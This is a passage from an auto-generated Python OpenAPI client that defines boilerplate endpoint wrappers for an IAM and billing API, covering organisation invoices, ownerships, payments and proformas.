_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Invoice]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_invoice_list = _Endpoint(
settings={
'response_type': ([Invoice],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/invoice',
'operation_id': 'iam_organisation_invoice_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
],
'required': [
'organisation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
},
'location_map': {
'organisation_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_invoice_list
)
def __iam_organisation_list(
self,
**kwargs
):
"""List iam/organisation # noqa: E501
List organisation # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_list(async_req=True)
>>> result = thread.get()
Keyword Args:
name (str): Filter by name. [optional]
billing_company (str): Filter by billing.company. [optional]
limit (float): Filter by $limit. [optional]
active (bool): Filter by active. [optional] if omitted the server will use the default value of False
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Organisation]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.iam_organisation_list = _Endpoint(
settings={
'response_type': ([Organisation],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation',
'operation_id': 'iam_organisation_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
'billing_company',
'limit',
'active',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'billing_company':
(str,),
'limit':
(float,),
'active':
(bool,),
},
'attribute_map': {
'name': 'name',
'billing_company': 'billing.company',
'limit': '$limit',
'active': 'active',
},
'location_map': {
'name': 'query',
'billing_company': 'query',
'limit': 'query',
'active': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_list
)
def __iam_organisation_ownership_create(
self,
organisation_id,
iam_organisation_ownership_create,
**kwargs
):
"""Create iam/organisation.ownership # noqa: E501
Create iam/organisation.ownership # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_ownership_create(organisation_id, iam_organisation_ownership_create, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
iam_organisation_ownership_create (IamOrganisationOwnershipCreate):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Organisation
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['iam_organisation_ownership_create'] = \
iam_organisation_ownership_create
return self.call_with_http_info(**kwargs)
self.iam_organisation_ownership_create = _Endpoint(
settings={
'response_type': (Organisation,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/ownership',
'operation_id': 'iam_organisation_ownership_create',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'iam_organisation_ownership_create',
],
'required': [
'organisation_id',
'iam_organisation_ownership_create',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'iam_organisation_ownership_create':
(IamOrganisationOwnershipCreate,),
},
'attribute_map': {
'organisation_id': 'organisationId',
},
'location_map': {
'organisation_id': 'path',
'iam_organisation_ownership_create': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__iam_organisation_ownership_create
)
def __iam_organisation_ownership_delete(
self,
organisation_id,
ownership_id,
**kwargs
):
"""Delete iam/organisation.ownership # noqa: E501
Delete iam/organisation.ownership # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_ownership_delete(organisation_id, ownership_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
ownership_id (str): ownershipId
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['ownership_id'] = \
ownership_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_ownership_delete = _Endpoint(
settings={
'response_type': None,
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/ownership/{ownershipId}',
'operation_id': 'iam_organisation_ownership_delete',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'ownership_id',
],
'required': [
'organisation_id',
'ownership_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'ownership_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'ownership_id': 'ownershipId',
},
'location_map': {
'organisation_id': 'path',
'ownership_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_ownership_delete
)
def __iam_organisation_ownership_get(
self,
organisation_id,
ownership_id,
**kwargs
):
"""Get iam/organisation.ownership # noqa: E501
Get iam/organisation.ownership # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_ownership_get(organisation_id, ownership_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
ownership_id (str): ownershipId
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Ownership
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['ownership_id'] = \
ownership_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_ownership_get = _Endpoint(
settings={
'response_type': (Ownership,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/ownership/{ownershipId}',
'operation_id': 'iam_organisation_ownership_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'ownership_id',
],
'required': [
'organisation_id',
'ownership_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'ownership_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'ownership_id': 'ownershipId',
},
'location_map': {
'organisation_id': 'path',
'ownership_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_ownership_get
)
def __iam_organisation_ownership_list(
self,
organisation_id,
**kwargs
):
"""List iam/organisation.ownership # noqa: E501
List iam/organisation.ownership # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_ownership_list(organisation_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Ownership]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_ownership_list = _Endpoint(
settings={
'response_type': ([Ownership],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/ownership',
'operation_id': 'iam_organisation_ownership_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
],
'required': [
'organisation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
},
'location_map': {
'organisation_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_ownership_list
)
def __iam_organisation_payment_allocate(
self,
organisation_id,
payment_id,
iam_organisation_payment_allocate,
**kwargs
):
"""Allocate iam/organisation.payment # noqa: E501
action allocate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_payment_allocate(organisation_id, payment_id, iam_organisation_payment_allocate, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
payment_id (str): paymentId
iam_organisation_payment_allocate (IamOrganisationPaymentAllocate):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Payment
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['payment_id'] = \
payment_id
kwargs['iam_organisation_payment_allocate'] = \
iam_organisation_payment_allocate
return self.call_with_http_info(**kwargs)
self.iam_organisation_payment_allocate = _Endpoint(
settings={
'response_type': (Payment,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/payment/{paymentId}/actions/allocate',
'operation_id': 'iam_organisation_payment_allocate',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'payment_id',
'iam_organisation_payment_allocate',
],
'required': [
'organisation_id',
'payment_id',
'iam_organisation_payment_allocate',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'payment_id':
(str,),
'iam_organisation_payment_allocate':
(IamOrganisationPaymentAllocate,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'payment_id': 'paymentId',
},
'location_map': {
'organisation_id': 'path',
'payment_id': 'path',
'iam_organisation_payment_allocate': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__iam_organisation_payment_allocate
)
def __iam_organisation_payment_get(
self,
organisation_id,
payment_id,
**kwargs
):
"""Get iam/organisation.payment # noqa: E501
Get iam/organisation.payment # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_payment_get(organisation_id, payment_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
payment_id (str): paymentId
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Payment
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['payment_id'] = \
payment_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_payment_get = _Endpoint(
settings={
'response_type': (Payment,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/payment/{paymentId}',
'operation_id': 'iam_organisation_payment_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'payment_id',
],
'required': [
'organisation_id',
'payment_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'payment_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'payment_id': 'paymentId',
},
'location_map': {
'organisation_id': 'path',
'payment_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_payment_get
)
def __iam_organisation_payment_list(
self,
organisation_id,
**kwargs
):
"""List iam/organisation.payment # noqa: E501
List iam/organisation.payment # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_payment_list(organisation_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Payment]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_payment_list = _Endpoint(
settings={
'response_type': ([Payment],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/payment',
'operation_id': 'iam_organisation_payment_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
],
'required': [
'organisation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
},
'location_map': {
'organisation_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_payment_list
)
def __iam_organisation_proforma_create(
self,
organisation_id,
iam_organisation_proforma_create,
**kwargs
):
"""Create iam/organisation.proforma # noqa: E501
Create iam/organisation.proforma # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_proforma_create(organisation_id, iam_organisation_proforma_create, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
iam_organisation_proforma_create (IamOrganisationProformaCreate):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Proforma
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['iam_organisation_proforma_create'] = \
iam_organisation_proforma_create
return self.call_with_http_info(**kwargs)
self.iam_organisation_proforma_create = _Endpoint(
settings={
'response_type': (Proforma,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/proforma',
'operation_id': 'iam_organisation_proforma_create',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'iam_organisation_proforma_create',
],
'required': [
'organisation_id',
'iam_organisation_proforma_create',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'iam_organisation_proforma_create':
(IamOrganisationProformaCreate,),
},
'attribute_map': {
'organisation_id': 'organisationId',
},
'location_map': {
'organisation_id': 'path',
'iam_organisation_proforma_create': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__iam_organisation_proforma_create
)
def __iam_organisation_proforma_download(
self,
organisation_id,
proforma_id,
**kwargs
):
"""Download iam/organisation.proforma # noqa: E501
action download # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_proforma_download(organisation_id, proforma_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
proforma_id (str): proformaId
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
file_type
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['proforma_id'] = \
proforma_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_proforma_download = _Endpoint(
settings={
'response_type': (file_type,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/proforma/{proformaId}/actions/download',
'operation_id': 'iam_organisation_proforma_download',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'proforma_id',
],
'required': [
'organisation_id',
'proforma_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'proforma_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'proforma_id': 'proformaId',
},
'location_map': {
'organisation_id': 'path',
'proforma_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/pdf',
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_proforma_download
)
def __iam_organisation_proforma_get(
self,
organisation_id,
proforma_id,
**kwargs
):
"""Get iam/organisation.proforma # noqa: E501
Get iam/organisation.proforma # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_proforma_get(organisation_id, proforma_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
proforma_id (str): proformaId
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Proforma
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['proforma_id'] = \
proforma_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_proforma_get = _Endpoint(
settings={
'response_type': (Proforma,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/proforma/{proformaId}',
'operation_id': 'iam_organisation_proforma_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'proforma_id',
],
'required': [
'organisation_id',
'proforma_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'proforma_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'proforma_id': 'proformaId',
},
'location_map': {
'organisation_id': 'path',
'proforma_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_proforma_get
)
def __iam_organisation_proforma_list(
self,
organisation_id,
**kwargs
):
"""List iam/organisation.proforma # noqa: E501
List iam/organisation.proforma # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_proforma_list(organisation_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Proforma]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
